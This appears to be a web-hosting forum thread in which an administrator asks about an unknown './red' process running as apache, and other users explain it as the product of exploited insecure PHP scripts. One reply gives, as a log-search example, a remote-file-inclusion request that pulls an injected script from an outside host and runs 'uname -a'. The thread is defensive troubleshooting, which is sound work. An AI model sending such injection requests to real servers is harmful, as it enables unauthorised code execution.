./red process - ???

J

jechilt

Verified User
Joined
Jun 21, 2004
Messages
212
Have never seen this process before when running "top -c"

Code: 
 6854 apache    11   4   300  300   252 S N   0.0  0.0   0:00   0 ./red

Then did a "netstat -aepN"

I see this odd entry:
Code: 
tcp        0      0 204.157.14.172:http     146.126.51.51:16335     ESTABLISHED apache     2147483647 -

What is /red? I see that it is in the bin directory but not sure what its purpose is. I have never seen this process running before. Any help would be appreciated.

Thanks!
 
thanks Jeff.

I ended up rebooting the server and that did the trick....it is gone now. just not sure why it was up and running with no link info to who was using it or anything.
ohhh well.....
 
That is the result of insecure php scripts and someone exploiting that to run their own applications.., resulting in that being ran as apache user..

These are ususally things like ping flood clients, IRC bouncers, password hackers, remote shell scripts..

Dig your logs and locate odd php request lines, and lecture your client to properly program :)
 
Wunk said:
That is the result of insecure php scripts and someone exploiting that to run their own applications.., resulting in that being ran as apache user..

These are ususally things like ping flood clients, IRC bouncers, password hackers, remote shell scripts..

Dig your logs and locate odd php request lines, and lecture your client to properly program :)
Click to expand...

The logs did not indicate much of anything.

However, we did do some software upgrades and it looks like things are much better at the moment
 
It boils down to looking for the needle in the virtual haystack (especially on a busy system)

You'll be looking for either some phpBB exploit where a lot of 'chr(' can be found in the access log, or something like: 'cmd=http://external.site/inject.txt?uname%20-a' (just an example)

You can't really prevent it, the only way is to restrict php into safe mode and disallow certain functions like exec(), but that will get you the wrath of your customers :)
 
You must log in or register to reply here.
Back
Top